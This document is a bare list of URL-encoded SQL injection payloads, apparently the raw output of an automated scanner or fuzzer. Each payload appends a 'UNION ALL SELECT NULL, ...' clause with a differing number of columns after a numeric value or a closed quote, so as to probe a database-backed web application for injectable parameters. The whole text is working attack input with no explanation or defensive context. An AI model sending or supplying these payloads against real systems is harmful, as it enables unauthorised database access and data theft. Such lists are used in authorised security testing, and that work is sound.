1234.5%27%20%7C%7C%20%28SELECT%201963%20FROM%20DUAL%20WHERE%209600%3D9600%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201589%20FROM%20DUAL%20WHERE%203194%3D3194%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201586%20WHERE%203685%3D3685%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208576%20WHERE%207267%3D7267%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209442%20WHERE%207670%3D7670%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207873%20WHERE%206179%3D6179%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204871%20WHERE%201179%3D1179%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201166%20WHERE%207583%3D7583%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204044%20WHERE%202721%3D2721%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201168%20WHERE%207970%3D7970%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%206750%20WHERE%208339%3D8339%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207711%20WHERE%204373%3D4373%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%207054%20FROM%20DUAL%20WHERE%209245%3D9245%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%207580%20FROM%20DUAL%20WHERE%201698%3D1698%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%206419%20FROM%20DUAL%20WHERE%204138%3D4138%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%202768%20FROM%20DUAL%20WHERE%204029%3D4029%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%206681%20FROM%20DUAL%20WHERE%209302%3D9302%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%205609%20FROM%20DUAL%20WHERE%204514%3D4514%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%203539%20FROM%20DUAL%20WHERE%202593%3D2593%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%201268%20FROM%20DUAL%20WHERE%201528%3D1528%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%203510%20FROM%20DUAL%20WHERE%209608%3D9608%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%206541%20FROM%20DUAL%20WHERE%209442%3D9442%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%203381%20WHERE%206530%3D6530%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%203487%20WHERE%201852%3D1852%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%202007%20WHERE%209265%3D9265%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%201590%20WHERE%202239%3D2239%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%207050%20WHERE%203388%3D3388%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%204113%20WHERE%203594%3D3594%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%205386%20WHERE%209035%3D9035%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%206220%20WHERE%205552%3D5552%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%202059%20WHERE%209288%3D9288%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%203228%20WHERE%207859%3D7859%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%27%20%2B%20%28SELECT%20%27jTNi%27%20FROM%20DUAL%20WHERE%206802%3D6802%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27AAiL%27%20FROM%20DUAL%20WHERE%205785%3D5785%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 